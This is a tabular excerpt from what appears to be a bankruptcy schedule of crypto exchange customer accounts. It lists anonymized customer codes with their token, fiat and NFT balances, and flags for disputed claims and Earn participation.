| 07374827 | | USD[10.00] | | |
| 07374829 | | BTC[.00010139], DOGE[90.81733237], USD[0.00] | | |
| 07374830 | | DOGE[164.29965628], USD[0.00] | | |
| 07374831 | | BRZ[1], CUSDT[3], USD[0.00] | | |
| 07374832 | | BRZ[1], CUSDT[6], TRX[1], USD[0.00] | | |
| 07374833 | | USD[10.00] | | |
| 07374835 | | USD[10.00] | | |
| 07374836 | | USD[10.00] | | |
| 07374837 | | USD[10.00] | | |
| 07374838 | | BTC[.05588047], ETH[.02709014], ETHW[.02709014], EUR[0.26], MATIC[0], PAXG[0.00000002], USD[488.80], USDT[0.00001097], WBTC[0.11706452] | | |
| 07374839 | | TRX[2], USD[0.00] | | |
| 07374840 | | USD[10.00] | | |
| 07374841 | | DOGE[14.26091272], USD[0.00] | | |
| 07374842 | | CUSDT[1], DOGE[5088.57801426], USD[0.00] | Yes | |
| 07374843 | | BTC[.00000039], DOGE[6182.65941217], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07374844 | | CUSDT[473.26703808], TRX[1], USD[0.00] | | |
| 07374845 | | CUSDT[1], DOGE[7587.43575488], USD[0.00] | Yes | |
| 07374846 | | NFT (310846634894600639/GSW Western Conference Finals Commemorative Banner #1251)[1], NFT (431409895718484033/GSW Western Conference Finals Commemorative Banner #1252)[1], NFT (456589649785447634/Warriors Hoop #50)[1], NFT (483720594043630425/GSW Championship Commemorative Ring)[1], NFT (495017072892495397/GSW Western Conference Semifinals Commemorative Ticket #664)[1], USD[0.01] | | |
| 07374847 | | DOGE[323.05499054], ETH[.09110146], ETHW[.09005168], TRX[1], USD[2.62], USDT[0] | Yes | |
| 07374848 | | BF_POINT[200], SHIB[423603.26802714], USD[0.00] | Yes | |
| 07374850 | | USD[10.00] | | |
| 07374852 | | USD[10.00] | | |
| 07374853 | | CUSDT[2], DOGE[89.3222391], USD[30.97] | | |
| 07374854 | | BAT[1], CUSDT[2], GRT[1], TRX[2], USD[0.01], USDT[0.00000001] | | |
| 07374855 | | BRZ[1], CUSDT[4], GRT[1], SHIB[3], TRX[1], USD[0.01], USDT[0.00000001] | | |
| 07374856 | | DOGE[ 144], SUSHI[.4675], USD[0.00], USDT[0] | | |
| 07374857 | | USD[10.00] | | |
| 07374858 | | BRZ[1], CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07374859 | | USD[10.00] | | |
| 07374861 | | CUSDT[11], DOGE[.24672336], TRX[3], USD[9.41] | | |
| 07374862 | | CUSDT[5], DOGE[377.48572412], ETH[.00000019], ETHW[.0211734], LINK[1.55400512], LTC[.09156335], MATIC[.00025713], NFT (435002667878310314/Saudi Arabia Ticket Stub #1683)[1], SHIB[958347.84289259], SOL[.00001013], SUSHI[1.33920404], TRX[.00356711], USD[0.00] | Yes | |
| 07374863 | | BRZ[2], CUSDT[2], ETH[.00000087], ETHW[.00000087], GRT[1.00404471], SHIB[1], TRX[2], USD[0.01] | Yes | |
| 07374864 | | TRX[162.99450904], USD[0.00] | | |
| 07374865 | | USD[10.00] | | |
| 07374866 | | DOGE[137.83658315], USD[0.00] | | |
| 07374867 | | TRX[4.56774015], USD[0.00] | | |
| 07374868 | | BTC[0], ETH[0], USD[0.00], USDT[0] | | |
| 07374869 | | USD[10.00] | | |
| 07374870 | | USD[0.00] | | |
| 07374871 | | USD[10.00] | | |
| 07374872 | | USD[10.00] | | |
| 07374873 | | ETH[.00514559], ETHW[.00514559], USD[0.00] | | |
| 07374874 | | USD[10.00] | | |
| 07374875 | | USD[10.00] | | |
| 07374876 | | DOGE[.86061423], TRX[1], USD[58.15] | | |
| 07374877 | | BAT[12.91135762], USD[0.00] | | |
| 07374878 | | BAT[1], BRZ[4], BTC[0], CUSDT[1], DOGE[0], TRX[3], USD[10.00] | | |
| 07374879 | | AAVE[.14783375], CUSDT[2], TRX[14.62906862], USD[0.00], USDT[0] | | |
| 07374881 | | BTC[.00062308], CUSDT[5], DOGE[1083.62469980], SHIB[822058.48938539], USD[0.00] | | |
| 07374882 | | USD[10.00] | | |
| 07374883 | | CUSDT[1], DOGE[12794.59492568], USD[0.00] | Yes | |
| 07374884 | | USD[10.00] | | |
| 07374885 | | USD[10.00] | | |
| 07374886 | | USD[10.00] | | |
| 07374887 | | BAT[1.01265106], BTC[.02822038], CUSDT[3], DOGE[1], ETH[6.10861381], ETHW[6.10612142], TRX[1], USD[2006.56] | Yes | |
| 07374888 | | BTC[.00022024], USD[0.00] | | |
| 07374889 | | CUSDT[1], DOGE[977.01532], USD[0.70] | | |
| 07374890 | | ETH[0], USD[0.02] | | |
| 07374891 | | USD[10.00] | | |
| 07374893 | | USD[10.00] | | |
| 07374894 | | USD[0.01], USDT[0] | Yes | |
| 07374895 | | DOGE[132.12580913], USD[0.00] | | |
| 07374896 | | USD[10.00] | | |
| 07374897 | | BCH[0], CUSDT[1], DAI[0], DOGE[0], ETH[0], PAXG[0], TRX[0], UNI[0], USD[0.00] | Yes | |
| 07374898 | | BRZ[1], CUSDT[1], DOGE[0], USD[0.00] | | |
| 07374899 | | DOGE[21.95612829], USD[0.00] | Yes | |
| 07374900 | | ETH[.01356145], ETHW[.01356145], TRX[1], USD[0.00] | | |
| 07374901 | | DOGE[224.37], PAXG[.00534302], TRX[1], USD[0.00] | | |
| 07374902 | | CUSDT[2], NFT (403054230088972678/#2500)[1], NFT (411293380539187616/#2166)[1], NFT (473257469701945254/#1455)[1], NFT (484674131357687446/#3395)[1], NFT (534939855152669683/#2732)[1], SHIB[4], SOL[.79409647], USD[0.00] | | |
| 07374903 | | DOGE[31.03394651], USD[0.00] | | |
| 07374904 | | BTC[.00034426], DOGE[135.31954666], USD[0.18] | | |
| 07374905 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07374906 | | USD[10.00] | | |
| 07374908 | | BTC[.00044081], CUSDT[1], DOGE[575.888698], LTC[.10850169], USD[10.38] | Yes | |
| 07374909 | | DOGE[169.96714953], USD[0.01] | | |
| 07374910 | | BRZ[2], ETH[0.00000088], ETHW[0.00000088], GBP[0.00], GRT[0.00712561], KSHIB[0], LTC[0], SHIB[82.16072325], SOL[0], TRX[.00447427], USD[193.50] | Yes | |
| 07374911 | Contingent, Disputed | DOGE[374.28161938], USD[-10.00] | | |
| 07374912 | | BAT[.0000668], USD[0.00] | | |
| 07374913 | | BRZ[2], CUSDT[4], USD[0.26] | | |
| 07374914 | | DOGE[136.67901698], USD[0.00] | | |
| 07374915 | | DOGE[283.09527212], LINK[0], LTC[.00000091], MATIC[9.90185524], NFT (437309971738006363/Sloth #6460)[1], SOL[0.93185908], USD[0.00], USDT[0.00000001] | Yes | |
| 07374916 | | BTC[.00109949], CUSDT[1], DOGE[1], USD[0.00] | | |
| 07374917 | | BTC[.00020347], DOGE[.0025938], USD[0.00] | Yes | |
| 07374918 | | USD[10.00] | | |
| 07374919 | | CUSDT[5], DOGE[.00007952], USD[23.60] | | |
| 07374920 | | BAT[.00032191], GRT[2.51150033], USD[4.87] | | |
| 07374921 | | BCH[0], DOGE[0], ETH[0], GBP[0.00], LTC[0], PAXG[0], SOL[0], USD[0.00] | Yes | |
| 07374922 | | USD[0.00], USDT[0.00629026] | | |
| 07374923 | | BTC[0.00001709], CUSDT[2], DOGE[59.33874011], ETH[.00239578], ETHW[.00080614], USD[0.00] | Yes | |
| 07374924 | | BRZ[1], BTC[.13330681], CUSDT[2], DOGE[278.69022686], TRX[1619.64879633], USD[0.00] | Yes | |
| 07374925 | | USD[10.00] | | |
| 07374926 | | BRZ[62.57622059], USD[0.00] | Yes | |
| 07374927 | | NFT (570972220821262851/Coachella x FTX Weekend 1 #866)[1], USD[10.00] | | |
| 07374928 | | AAVE[.04681], ETHW[1.59761989], SOL[.10154], SUSHI[1.3852], USD[0.00], USDT[0] | | |
| 07374929 | | DOGE[4.91904439], USD[0.00] | | |
| 07374930 | | BTC[.00018036], CUSDT[1], USD[0.00] | | |
| 07374931 | | USD[10.00] | | |
| 07374932 | | USD[20.00] | | |
| 07374933 | | USD[10.00] | | |
| 07374934 | | USD[10.00] | | |
| 07374935 | | USD[10.00] | | |
| 07374936 | | USD[10.00] | | |
| 07374937 | | CUSDT[2], DOGE[.32179407], USD[0.15] | | |
| 07374938 | | USD[10.00] | | |
| 07374940 | | BRZ[1], CUSDT[4], DOGE[355.05713955], ETHW[.00624186], LINK[.09757756], SHIB[2], TRX[1], USD[0.00], USDT[.19888146] | | |
| 07374941 | | USD[10.00] | | |
| 07374942 | | BRZ[1], CUSDT[2], DOGE[2193.65962174], GRT[1], TRX[1], USD[0.00] | | |
| 07374943 | | USD[10.00] | | |
| 07374944 | | USD[10.00] | | |
| 07374945 | | USD[10.00] | | |
| 07374946 | | SOL[.02000001], USD[0.00], USDT[0] | | |
| 07374948 | | USD[10.00] | | |
| 07374949 | | USD[10.00] | | |
| 07374950 | | USD[10.00] | | |
| 07374951 | | BTC[.00017857], USD[0.00] | | |
| 07374952 | | MATIC[5.92518523], USD[0.00] | | |
| 07374953 | | USD[10.00] | | |
| 07374954 | | BRZ[1], CUSDT[3], DOGE[1], TRX[2], USD[0.44] | | |
| 07374956 | | USD[0.06] | | |
| 07374957 | | USD[10.00] | | |
| 07374958 | | USD[10.00] | | |
| 07374959 | | USD[10.00] | | |
| 07374960 | | USD[10.32] | Yes | |
| 07374961 | | CUSDT[2], DOGE[1017.30740788], TRX[1], USD[0.01] | | |
| 07374962 | | AAVE[.0000037], ETH[.00000002], ETHW[.00000002], SOL[.00003688], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07374963 | | USD[10.00] | | |
| 07374964 | | BAT[1], DOGE[1], ETH[1.01749439], ETHW[1.01749439], SOL[11.12010321], TRX[2], USD[0.00] | | |
| 07374965 | | BTC[.00013572], CUSDT[1], DOGE[8.45327986], USD[0.00] | | |
| 07374966 | | USD[0.00], USDT[0] | Yes | |
| 07374967 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07374968 | | USD[10.00] | | |
| 07374969 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07374970 | | GRT[28.52129218], USD[0.00] | Yes | |
| 07374972 | | BRZ[1], CUSDT[4], DOGE[0], TRX[2], USD[0.00] | | |
| 07374973 | | DOGE[33.19262932], USD[0.18] | | |
| 07374974 | | SHIB[1], SOL[1.16403982], USD[0.00] | Yes | |
| 07374975 | | CUSDT[1], DOGE[195.27334457], USD[1.00] | | |
| 07374976 | | USD[10.00] | | |
| 07374977 | | USD[10.00] | | |
| 07374979 | | BTC[.00232865], DOGE[0], USD[0.00] | | |
| 07374980 | | BAT[2.10605759], BRZ[1], DOGE[0], GRT[3.15674743], LTC[0], TRX[1], USD[0.00], USDT[1.09675058] | Yes | |
| 07374981 | | USD[10.00] | | |
| 07374982 | | USD[10.00] | | |
| 07374983 | | BRZ[1], CUSDT[3], USD[0.00] | Yes | |
| 07374984 | | USD[10.00] | | |
| 07374985 | | USD[10.00] | | |
| 07374987 | | BRZ[6.2408768], CAD[0.00], DOGE[0], ETHW[.00000049], GRT[1.00367791], MATIC[.00007267], SHIB[16], SOL[0], TRX[16.59705911], USD[174.53] | Yes | |
| 07374988 | | USD[0.00] | | |
| 07374989 | | SOL[0], USD[0.00] | | |
| 07374990 | | USD[10.00] | | |
| 07374991 | | USD[10.00] | | |
| 07374992 | | USD[10.00] | | |
| 07374993 | | USD[10.00] | | |
| 07374994 | | BAT[0], DOGE[127.03473372], USD[0.00] | Yes | |
| 07374995 | | SHIB[467945.28286841], USD[0.00] | Yes | |
| 07374996 | | USD[10.00] | | |
| 07374997 | | USD[10.00] | | |
| 07374998 | | ALGO[.00057142], BAT[.00012605], BRZ[1], DOGE[2], GRT[.00164508], LINK[.0000153], MATIC[.00034614], MKR[.00000027], NEAR[.00002401], SHIB[45], UNI[.00000884], USD[0.01], YFI[.00000001] | Yes | |
| 07374999 | | USD[10.00] | | |
| 07375000 | | BRZ[1], CUSDT[2], TRX[1], USD[0.00] | | |
| 07375001 | | USD[10.00] | | |
| 07375002 | | USD[10.00] | | |
| 07375003 | | BRZ[1], CUSDT[3], DOGE[722.88578659], TRX[2], USD[0.00] | Yes | |
| 07375004 | | USD[10.00], USDT[5.74431167] | | |
| 07375005 | | USD[10.00] | | |
| 07375007 | | DOGE[418.04819625], USD[10.00] | | |
| 07375008 | | SHIB[58351590], SUSHI[627.372], USD[0.00], USDT[0] | | |
| 07375009 | | USD[10.00] | | |
| 07375011 | | CUSDT[2], DOGE[643.5222008], TRX[1], USD[0.00] | | |
| 07375012 | | CUSDT[1], USD[52.21] | | |
| 07375013 | | BAT[1], CUSDT[5], DOGE[.80286325], GRT[1], SHIB[1], SUSHI[1], TRX[5], USD[0.51] | | |
| 07375014 | | ETH[.0050964], ETHW[.0050964], TRX[1], USD[0.00] | | |
| 07375015 | | CUSDT[4], DOGE[0], ETH[0.03701258], ETHW[0.03655144], KSHIB[0], LTC[0], SHIB[1], SOL[5.20997558], USD[0.01] | Yes | |
| 07375016 | | BRZ[2], CUSDT[3], USD[0.01] | | |
| 07375017 | | DAI[7.17320119], USD[0.00] | | |
| 07375018 | | DOGE[135.49683845], USD[0.00] | | |
| 07375020 | | USD[10.00] | | |
| 07375021 | | DOGE[139.89723708], USD[0.00] | | |
| 07375022 | | USD[10.00] | | |
| 07375023 | | USD[10.00] | | |
| 07375024 | | USD[0.00], USDT[0] | | |
| 07375025 | | USD[10.00] | | |
| 07375026 | | BTC[.0001986], USD[0.00] | | |
| 07375027 | | USD[10.00] | | |
| 07375028 | | DOGE[65.53051786], USD[0.00] | | |
| 07375029 | | USD[10.00] | | |
| 07375030 | | USD[10.00] | | |
| 07375031 | | BAT[1.0165555], CUSDT[2], TRX[2], USD[733.46] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07375032 | | USD[10.00] | | |
| 07375033 | | USD[10.00] | | |
| 07375034 | | BAT[0], BRZ[0.00004566], BTC[0], CUSDT[0], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | | |
| 07375035 | | CUSDT[2], DOGE[482.60841883], ETH[.0232322], ETHW[.0232322], USD[0.00] | | |
| 07375036 | | BRZ[4], CUSDT[1], GRT[1], LINK[14.53229157], USD[0.00] | | |
| 07375037 | | CUSDT[2], USD[89.97] | | |
| 07375038 | | BTC[0], GRT[.1652], SUSHI[0], USD[784.85], USDT[0.00000001] | | |
| 07375039 | | USD[10.00] | | |
| 07375040 | | USD[10.00] | | |
| 07375041 | | USD[10.00] | | |
| 07375042 | | CUSDT[4], DOGE[87.74876302], USD[0.00] | | |
| 07375043 | | USD[0.00] | | |
| 07375044 | | BRZ[1], CUSDT[3], SHIB[3], USD[0.00] | | |
| 07375045 | | BAT[2], BRZ[2], BTC[0], CUSDT[22], DOGE[1], ETH[0], GRT[2], TRX[8], USD[0.00], USDT[0.00000001] | | |
| 07375046 | | USD[10.00] | | |
| 07375047 | | USD[10.00] | | |
| 07375048 | | ETH[.00000001], SOL[26.4936], USDT[1.78512539] | | |
| 07375049 | | BTC[.00035815], CUSDT[4], DOGE[307.05374017], ETH[.00276506], ETHW[.0027285], TRX[1], USD[0.00] | Yes | |
| 07375050 | | BTC[.00139438], TRX[1], USD[0.00] | Yes | |
| 07375051 | | USD[0.00] | | |
| 07375052 | | DOGE[138.90096555], USD[0.00] | | |
| 07375053 | | USD[10.00] | | |
| 07375054 | | CUSDT[3], DOGE[1], TRX[330.99719076], USD[0.00] | | |
| 07375055 | | CUSDT[1], DOGE[.00002208], TRX[2], USD[0.01] | | |
| 07375056 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07375057 | | GRT[7.01077622], USD[0.00] | | |
| 07375058 | | BRZ[1], CUSDT[5], TRX[1], USD[0.00] | | |
| 07375059 | | DOGE[27.56943214], USD[0.00] | | |
| 07375060 | | USD[10.00] | | |
| 07375061 | | USD[0.01] | | |
| 07375062 | | CUSDT[1], DOGE[1], KSHIB[326.70800478], TRX[1730.64296709], USD[0.00], USDT[0.00000001] | | |
| 07375063 | | BAT[1.01655638], BRZ[2], CUSDT[8], DOGE[0], ETH[0], LTC[0], SHIB[1], USD[0.01] | Yes | |
| 07375064 | | BAT[1], CUSDT[3], DOGE[5835.63709695], TRX[4], USD[0.00] | | |
| 07375065 | | BAT[1.0165555], BRZ[2], CUSDT[4], GRT[1.00312819], TRX[8], USD[0.01] | Yes | |
| 07375067 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07375068 | | USD[10.00] | | |
| 07375069 | | USD[10.00] | | |
| 07375070 | | BTC[0], LINK[0], USD[0.00] | | |
| 07375071 | | USD[10.00] | | |
| 07375072 | | CUSDT[1], DOGE[31.37313858], USD[0.00] | | |
| 07375074 | | CUSDT[8], TRX[2], USD[0.32] | | |
| 07375075 | | CUSDT[1], SHIB[594322.04287733], TRX[3670.45545281], USD[0.00] | | |
| 07375077 | | USD[10.00] | | |
| 07375078 | | DOGE[20.80000306], USD[0.00] | | |
| 07375079 | | BAT[5.29393461], BTC[0], USD[0.00] | | |
| 07375080 | | SUSHI[.67610492], USD[0.00] | | |
| 07375081 | | CUSDT[1], DOGE[30.26638709], USD[0.00] | | |
| 07375082 | | LINK[177.42810867], TRX[1], USD[0.00] | | |
| 07375083 | | USD[10.00] | | |
| 07375084 | | USD[10.00] | | |
| 07375085 | | DOGE[2], USD[0.00] | | |
| 07375086 | | USD[11.36] | | |
| 07375087 | | USD[10.00] | | |
| 07375088 | | USD[10.00] | | |
| 07375089 | | CUSDT[1], DOGE[136.10938403], USD[0.00] | | |
| 07375090 | | USD[10.00] | | |
| 07375091 | | BRZ[1], CUSDT[1], DOGE[.0006586], USD[0.42] | | |
| 07375092 | | LINK[2.8449529], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07375093 | | USD[10.00] | | |
| 07375094 | | USD[10.00] | | |
| 07375096 | | CUSDT[1], DOGE[28.30129513], USD[0.00] | | |
| 07375097 | | BAT[1.0165555], BTC[.0000001], CUSDT[15], DOGE[4634.06449513], GRT[2.08586476], SHIB[15791222.35649775], TRX[6.08809625], USD[29.99], USDT[2.22070006] | Yes | |
| 07375098 | | USD[10.00] | | |
| 07375099 | | BRZ[1], CUSDT[15], DOGE[1], TRX[2], USD[2.80], USDT[1] | | |
| 07375101 | | USD[10.00] | | |
| 07375102 | | BTC[.00064530], DOGE[0], ETH[.03824451], ETHW[.03776605], GRT[0], LTC[0], TRX[1], USD[0.00] | Yes | |
| 07375103 | | USD[10.00] | | |
| 07375104 | | USD[10.00] | | |
| 07375105 | | USD[10.00] | | |
| 07375106 | | ETH[.00515928], ETHW[.00515928], USD[0.00] | | |
| 07375107 | | USD[10.00] | | |
| 07375108 | | USD[10.00] | | |
| 07375109 | | USD[10.00] | | |
| 07375112 | | SOL[52.0922], USD[-470.91] | | |
| 07375113 | | USD[10.00] | | |
| 07375114 | | CUSDT[1], DOGE[.00000888], TRX[2], USD[0.01] | | |
| 07375115 | | USD[0.00] | | |
| 07375116 | | CUSDT[8], DOGE[3372.94238054], GRT[1.00313735], SHIB[1], SOL[3.97645193], TRX[2], USD[101.90] | Yes | |
| 07375118 | | USD[9.00] | | |
| 07375119 | | BRZ[1], BTC[.01789398], CUSDT[1], DOGE[15552.64086881], ETH[.00247955], ETHW[.0024217], MATIC[54.46513685], TRX[1], USD[0.00] | Yes | |
| 07375120 | | USD[10.00] | | |
| 07375121 | | BTC[0.00371184], USD[0.00] | | |
| 07375122 | | TRX[2], USD[0.00] | | |
| 07375123 | | USD[0.00] | | |
| 07375124 | | BTC[.00035602], DOGE[1], TRX[1], USD[0.00] | Yes | |
| 07375126 | | BRZ[1], DOGE[2], TRX[1], USD[0.00] | Yes | |
| 07375127 | | USD[10.00] | | |
| 07375129 | | BTC[0.00000195], USD[6.35], USDT[0] | | |
| 07375130 | | CUSDT[2], DOGE[.00489002], ETH[2.36724811], ETHW[2.36623226], TRX[2], USD[130.95] | Yes | |
| 07375131 | | BAT[1.0165555], BRZ[1], CUSDT[2], USD[1.80] | Yes | |
| 07375132 | | BTC[.00013689], USD[0.00] | | |
| 07375133 | | DOGE[1446.31044061], SHIB[14761.48433819], TRX[2], USD[0.02] | Yes | |
| 07375134 | | BRZ[2], USD[0.00], USDT[1] | | |
| 07375135 | | BRZ[1], DOGE[754.80954614], GRT[1], USD[0.00] | | |
| 07375136 | | USD[10.00] | | |
| 07375137 | Contingent, Disputed | USD[10.00] | | |
| 07375138 | | BTC[0], DOGE[3373.94288396], ETH[.00355363], ETHW[.00355363], USD[0.00] | | |
| 07375139 | | BTC[.00296244], CUSDT[5], DOGE[607.99171311], ETH[.014894], ETHW[.0147082], SHIB[6337149.71536308], USD[0.00] | Yes | |
| 07375140 | | USD[11.03] | Yes | |
| 07375141 | | USD[10.00] | | |
| 07375142 | | USD[10.00] | | |
| 07375143 | | USD[10.00] | | |
| 07375144 | | BTC[.00021453], USD[2781.86], USDT[1.10803038] | Yes | |
| 07375145 | | BAT[1], CUSDT[1], DOGE[.00003035], TRX[1], USD[0.00], USDT[0] | | |
| 07375146 | | USD[10.00] | | |
| 07375147 | | BAT[1.01651299], CUSDT[3], DOGE[42661.2663525], GRT[1.00486315], TRX[2], USD[0.00], USDT[2.22104437] | Yes | |
| 07375148 | | BAT[4.98910012], CUSDT[17.92737611], ETH[.00177023], ETHW[.00174285], MATIC[.78291353], SHIB[604855.78089661], SOL[.04048247], TRX[1], USD[0.00], USDT[.99408261] | Yes | |
| 07375149 | | USD[10.00] | | |
| 07375150 | | USD[10.00] | | |
| 07375151 | | USD[10.00] | | |
| 07375152 | | BCH[.0065723], DOGE[101.3414016], SOL[.17121241], USD[5.26], USDT[7.70792914] | Yes | |
| 07375153 | | USD[0.00], USDT[0] | Yes | |
| 07375154 | | USD[0.00] | Yes | |
| 07375155 | | USD[10.00] | | |
| 07375156 | | USD[10.00] | | |
| 07375157 | | BTC[0], DOGE[444.31182010], ETH[0], GRT[0], TRX[0], USD[0.02], USDT[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07375159 | | USD[10.00] | | |
| 07375160 | | DOGE[179.99344103], USD[0.00] | | |
| 07375161 | | USD[0.00] | | |
| 07375162 | | CUSDT[1], SHIB[524264.85721255], TRX[1], USD[0.00] | | |
| 07375163 | | USD[0.00] | | |
| 07375164 | | CUSDT[2], DOGE[607.59763977], TRX[2], USD[0.00] | | |
| 07375165 | | USD[10.00] | | |
| 07375166 | | USD[10.00] | | |
| 07375167 | | BTC[0.00090512], DOGE[0], ETH[0.00000001], GRT[0], KSHIB[0], LTC[0], SHIB[12778292.37518119], SOL[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07375168 | | USD[10.00] | | |
| 07375169 | | USD[10.00] | | |
| 07375170 | | BAT[.00002792], BRZ[3], CUSDT[25], DOGE[12.54599775], GRT[15443.01898807], LINK[.00000932], SHIB[214526.04378437], SOL[57.3334484], SUSHI[.00000932], TRX[8], USD[1777.95], USDT[0] | | |
| 07375172 | | BTC[0.00009826], DOGE[0], SOL[.0024], SUSHI[0.37000000], USD[55.28] | | |
| 07375173 | | CUSDT[27.11545474], DOGE[0], ETH[0.08654454], ETHW[0.08552389], TRX[2], USD[0.00] | Yes | |
| 07375174 | | USD[10.00] | | |
| 07375175 | | TRX[1], USD[0.00] | | |
| 07375176 | | USD[10.00] | | |
| 07375177 | | USD[10.00] | | |
| 07375178 | | BAT[0], BRZ[1], CUSDT[4], DOGE[0], ETH[0], GRT[1], TRX[1], UNI[0], USD[0.00], USDT[1] | | |
| 07375179 | | CUSDT[1], GRT[810.04939056], SUSHI[77.56728293], TRX[1], USD[0.00] | Yes | |
| 07375180 | | USD[0.01], USDT[0] | | |
| 07375181 | | BTC[.00022874], USD[0.00] | | |
| 07375182 | | USD[10.00] | | |
| 07375183 | | DOGE[1], USD[0.00] | | |
| 07375187 | | USD[0.12] | | |
| 07375189 | | USD[9.41] | | |
| 07375190 | | CUSDT[2], DOGE[1], TRX[1], USD[0.00] | | |
| 07375191 | | USD[10.00] | | |
| 07375192 | | ALGO[0], BRZ[1], DOGE[1], ETHW[.64227171], GRT[2], SHIB[2], TRX[1], USD[0.00] | | |
| 07375193 | | USD[10.00] | | |
| 07375194 | | DOGE[134.45620398], USD[0.00] | | |
| 07375195 | | USD[10.00] | | |
| 07375196 | | SHIB[31672406.1473922], USD[0.00], USDT[0] | | |
| 07375197 | | CUSDT[2], USD[0.00] | | |
| 07375198 | | USD[10.00] | | |
| 07375199 | | DOGE[1], USD[0.00] | | |
| 07375200 | | USD[10.00] | | |
| 07375201 | | USD[0.00] | | |
| 07375202 | | BCH[.02795024], CUSDT[10], DOGE[666.12561958], ETH[.00597795], ETHW[.00590955], LINK[.74887389], LTC[.10634413], TRX[157.42288204], USD[0.69], USDT[1.1076863] | Yes | |
| 07375203 | | USD[10.00] | | |
| 07375205 | | BTC[.0052215], ETH[.159957], ETHW[.159957], USD[329.54] | | |
| 07375206 | | BTC[.00090986], DOGE[1930.91931733], ETH[.00608824], ETHW[.00600884], TRX[64.55298732], USD[0.00] | Yes | |
| 07375207 | | BRZ[2], BTC[0.05577009], CAD[0.00], CUSDT[43], DOGE[656.11536144], ETH[0.53851973], ETHW[0.53851973], GRT[1], LTC[1.01227247], MKR[.06917723], SHIB[10101108.04189504], SOL[.34178759], TRX[5489.99686482], USD[0.00], YFI[.08821195] | | |
| 07375208 | | CUSDT[2], USD[142.60] | Yes | |
| 07375209 | | CUSDT[1], DOGE[2.14659501], TRX[2], USD[0.00] | Yes | |
| 07375210 | | BRZ[1], CUSDT[2], DOGE[15.02048462], LTC[.02795752], SOL[.00453757], SUSHI[.12429941], UNI[.11507879], USD[0.00] | Yes | |
| 07375211 | | DOGE[1.0078346], USD[0.00] | | |
| 07375212 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07375213 | | BCH[.17615435], CUSDT[5], DOGE[5799.72408875], ETH[.04949822], ETHW[.04888262], GRT[.00009661], LTC[.06453848], SHIB[574587.61693988], SUSHI[1.35058349], TRX[2244.09593517], USD[0.68] | Yes | |
| 07375214 | | BCH[0], BRZ[2], BTC[0], CUSDT[2.00269282], DOGE[2], ETH[0], GRT[2.05117341], NFT [336066224316638458/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #57][1], SOL[0], TRX[6], USD[0.00], USDT[7.90361037] | Yes | |
| 07375215 | | DOGE[12.83916296], USD[0.00], USDT[0] | | |
| 07375216 | | USD[10.00] | | |
| 07375217 | | BTC[.00021981], CUSDT[1], DOGE[5875.53008276], USD[0.00] | | |
| 07375218 | | DOGE[18.99761194], USD[1.47] | | |
| 07375219 | | USD[10.00] | | |
| 07375220 | | BRZ[1], CUSDT[4], TRX[3], USD[0.00] | | |
| 07375222 | | BTC[0], DOGE[417.15372494], SUSHI[0], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07375223 | | BAT[2], BRZ[4], CUSDT[15], DOGE[1], TRX[12], USD[0.00], USDT[1] | | |
| 07375224 | | CUSDT[1], TRX[1], USD[74.01] | | |
| 07375225 | | USD[10.00] | | |
| 07375226 | | BRZ[1], DOGE[3681.50525944], USD[22.36] | | |
| 07375228 | | BTC[.00021751], DOGE[3083.03793224], USD[0.00] | | |
| 07375229 | | BTC[.00017877], USD[0.00] | | |
| 07375230 | | USD[10.78] | Yes | |
| 07375232 | | DOGE[.00072587], ETH[.00005261], ETHW[.00005261], TRX[1], USD[0.00] | Yes | |
| 07375233 | | USD[10.00] | | |
| 07375234 | | BAT[2.12254791], BRZ[2], CUSDT[5], DOGE[1.91196385], GRT[1.00498957], TRX[6], USD[0.01] | Yes | |
| 07375235 | | DOGE[0], USD[0.00], USDT[0] | | |
| 07375236 | | BAT[.00106461], CUSDT[14], ETH[.00000075], ETHW[.00000075], LINK[.00004154], LTC[.00001018], SHIB[8], SOL[0], SUSHI[.00020827], TRX[.00318112], UNI[1.18987331], USD[0.00] | Yes | |
| 07375237 | | USD[10.00] | | |
| 07375238 | | BAT[2], BRZ[1], CUSDT[4], DOGE[2], TRX[4], USD[0.00], USDT[2] | | |
| 07375239 | | USD[10.00] | | |
| 07375244 | | BAT[.00000718], BRZ[4], DOGE[.00004869], TRX[.00003742], USD[0.00], USDT[1.0793957] | Yes | |
| 07375245 | | CUSDT[1], GRT[13.30165189], USD[0.00] | | |
| 07375246 | | DOGE[41.93492261], USD[0.00] | | |
| 07375247 | | USD[11.11] | Yes | |
| 07375248 | | DOGE[46.54193846], ETH[.00682385], ETHW[.00674177], SHIB[70636.35928741], USD[0.00] | Yes | |
| 07375249 | | USD[10.00] | | |
| 07375252 | | USD[10.00] | | |
